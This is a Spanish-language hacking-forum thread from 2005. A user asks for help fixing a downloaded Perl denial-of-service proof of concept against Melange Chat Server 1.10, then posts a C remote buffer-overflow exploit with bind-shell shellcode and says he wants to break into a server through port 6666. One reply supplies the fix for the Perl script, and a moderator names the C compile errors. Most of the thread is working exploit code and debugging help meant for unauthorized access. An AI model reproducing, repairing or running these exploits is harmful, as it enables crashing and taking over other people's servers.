elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  AYUDA! Tengo un error al ejecutar un exploit en Perl , necesito corregirlo
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: AYUDA! Tengo un error al ejecutar un exploit en Perl , necesito corregirlo  (Leído 2,052 veces)
miguecapo123

Desconectado Desconectado

Mensajes: 3


Ver Perfil
AYUDA! Tengo un error al ejecutar un exploit en Perl , necesito corregirlo
« en: 22 Septiembre 2005, 19:03 »

Hola amigos.
Pues me baje un exploit para el Melange Chat Server 1.10 y cuando lo ejecuto en DOS con Active perl tengo el siguiente error. Undefined subroutine &main::do_malange called at melange.pl line 23.
Me pueden ayudar a corregirlo? Desde ya muchas gracias  :D

El script es este:

Citar
#!/usr/bin/perl
#Melange Chat Server Remote DDOS POC
#By DVDMAN (DVDMAN@L33TSECURITY.COM)
#WWW.L33TSECURITY.COM
#L33T SECURITY


use Getopt::Std;
use IO::Socket;
$|=1;


my %options;
getopt('Hhp',\%options);
$arg2 = shift(@ARGV);
$options{h} && usage();
if ($options{H})
{
do_melage();
}
if ($options{p})
{
do_malange();
}
else
{
usage();
}
sub usage()
{
    print("[L33TSECURITY] Malange Chat Remote DDOS\n");
    print(" (C) DVDMAN \n\n");
    print("Usage: $0 [options]\n");
    print("-H = hostname or ip REQUIRED\n");
    print("-p = port of ftp server REQUIRED\n");
}
 
exit(1);

 

sub malange() {
my $test = $options{H};
my $test2 = $options{p};

    $remote = IO::Socket::INET->new(
                        Proto     => "tcp",
                                PeerAddr  => $test,
                                PeerPort  => $test2,
        );
    unless ($remote) {
           print"error cannot connect";
           return
        }
    $remote->autoflush(1);


print STDERR "Melange Chat Server REMOTE DDOS BY DVDMAN\n";
print STDERR " starting attack in 5 seconds...\n";
sleep(5);

my $user = "user test test 0 0\r\n";
my $exploit = "/yell" . " " . "A"x600;


print $remote $user;
print $remote $exploit;
print STDERR "DONE\n";
die "BYE\n";
}





#By DVDMAN (DVDMAN@L33TSECURITY.COM)
#WWW.L33TSECURITY.COM
#L33T SECURITY



« Última modificación: 22 Septiembre 2005, 19:05 por miguecapo123 » En línea

Ivanchuk


Desconectado Desconectado

Mensajes: 469


LLVM


Ver Perfil WWW
Re: AYUDA! Tengo un error al ejecutar un exploit en Perl , necesito corregirlo
« Respuesta #1 en: 23 Septiembre 2005, 01:31 »

Cambiá:
Código:
sub malange() {
por:
Código:
sub do_malange() {
Pregunto, por curosiodad nomás, eso provoca DoS no?, porque no se le ven perspectivas de obtención de shell.
Felices reventadas  ;D.
Bytes.
En línea

Sólo quien practica lo absurdo puede lograr lo imposible.

Join us @ http://foro.h-sec.org
sirdarckcat
Aspirante a supervillano
Moderador Global
***
Desconectado Desconectado

Mensajes: 7.013


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: AYUDA! Tengo un error al ejecutar un exploit en Perl , necesito corregirlo
« Respuesta #2 en: 23 Septiembre 2005, 03:58 »

Bueno, he descubierto que los exploits, en su gran gran mayoria tienen errores, para que solo los que saben programar sepan como corregirlos, y luego explotarlos, y que no caigan en manos equivocadas..

porcierto ivanchuk, si es de DOS, es bastante conocido el exploit..

Citar
print STDERR "Melange Chat Server REMOTE DDOS BY DVDMAN\n";

solo para ayudar a los de leet security un poquito en popularidad:

WWW.L33TSECURITY.COM

jeje.
En línea

miguecapo123

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: AYUDA! Tengo un error al ejecutar un exploit en Perl , necesito corregirlo
« Respuesta #3 en: 27 Septiembre 2005, 16:59 »

Holaaa, gracias por responder  8)

Pero no me funciono...  :(
Reemplaze con eso y tengo un error en la linea 24  :-\

En realidad necesito entrar por el melange (puerto 6666) a un servidor, aca tengo otro exploit en C creo que es mejor, tambien intente compilar y no me funciono. Me pueden ayudar?? muchas graciass!  ;) ;) ;)

Citar
C:\cygwin\bin>gcc -o melange1 melange1.c
melange1.c: In function `main':
melange1.c:28: error: storage size of 'serv_addr' isn't known
melange1.c:34: error: missing terminating " character
melange1.c:35: error: parse error before '[' token
melange1.c:35: error: stray '\' in program
melange1.c:35: error: missing terminating " character
melange1.c:57: error: missing terminating " character
melange1.c:60: error: stray '\' in program
melange1.c:60: error: `NICKNAME' undeclared (first use in this function)
melange1.c:60: error: (Each undeclared identifier is reported only once
melange1.c:60: error: for each function it appears in.)
melange1.c:60: error: parse error before "n"
melange1.c:60: error: missing terminating " character


melange1.c

Citar
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>


// magic numbers begin here
#define ADDR 0xbfffd490
#define NICKLEN 49
#define BUFFLEN 463
// magic numbers end


// brutally copied from Irian's cy.c
char evil[]=
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\x52\x50\xcd\x80\x43"
"\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\x52\x50\xb0\x66\xcd\x80\x89\xe1\xb3\x04"
"\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x89\xd9\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x52"
"\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";


int main(int argc,char **argv){
    int i,j=0,sock,port = 6666;
    char *host;
    char nick[NICKLEN],buff[BUFFLEN];
    struct hostent *htent;
    struct sockaddr_in serv_addr;
    long jump = ADDR;
    u_long *ptr = (u_long *)buff;


    if(argc>4||argc<2)
        printf("Usage : %s [hostname] [ret address in hex (0x41414141)]
[port]\n",argv[0]),exit(1);


    host=argv[1];
    if(argc>2) sscanf(argv[2],"0x%lx",&jump);
    if(argc>3) port=atoi(argv[3]);


    if((htent = gethostbyname(argv[1])) != NULL && (sock =
socket(AF_INET,SOCK_STREAM,0)) != -1){


        serv_addr.sin_family = AF_INET;
        memcpy((char
*)&serv_addr.sin_addr.s_addr,htent->h_addr_list[0],htent->h_length);
        serv_addr.sin_port = htons(port);


        if(!connect(sock,(struct sockaddr
*)&serv_addr,sizeof(serv_addr))){


            printf("Connected to %s at %d [0x%lx]\nTrying to send %d chars


NICKNAME\n",host,port,jump,sizeof(nick)-6);


            memset(nick,'A',sizeof(nick)),memcpy(nick,"/NICK ",6);


            if(send(sock,nick,sizeof(nick),0) == -1)
                perror("Sending nickname failed\n"),exit(1);
            sleep(1);


            for(i=0;i<sizeof(buff);i+=4) *(ptr++)=jump;
            for(i=0;i<sizeof(buff)-200-strlen(evil);i++) buff=0x90;
            for(j=0;j<strlen(evil);j++) buff[i++]=evil[j];


            printf("Trying to send overflow string\n");


            if(send(sock,buff,sizeof(buff),0) == -1)
                perror("Sending overflow failed :(\n"),exit(1);


            sleep(1);
            printf("Now try to connect to host : %s port : 26112\n",host);
            close(sock);
        }
        else printf("Can't connect to %s at %d\n",host,port),exit(1);
    }
}
En línea

miguecapo123

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: AYUDA! Tengo un error al ejecutar un exploit en Perl , necesito corregirlo
« Respuesta #4 en: 27 Septiembre 2005, 17:02 »

Hola, la carita esa que sale ahi molesta en el codigo
asi es el reglon original.

Código:
                perror("Sending overflow failed :(\n"),exit(1);
« Última modificación: 27 Septiembre 2005, 17:04 por miguecapo123 » En línea

sirdarckcat
Aspirante a supervillano
Moderador Global
***
Desconectado Desconectado

Mensajes: 7.013


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: AYUDA! Tengo un error al ejecutar un exploit en Perl , necesito corregirlo
« Respuesta #5 en: 28 Septiembre 2005, 00:13 »

los errores son:

storage size of 'serv_addr' isn't known
esto es que jamas dijiste cual era la estructura sockaddr

en la linea 34 y otras hay 1 o 2 saltos de linea que no deberia haber.

tu mismo corrigelos.
antes de postear lee las reglas de este foro.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines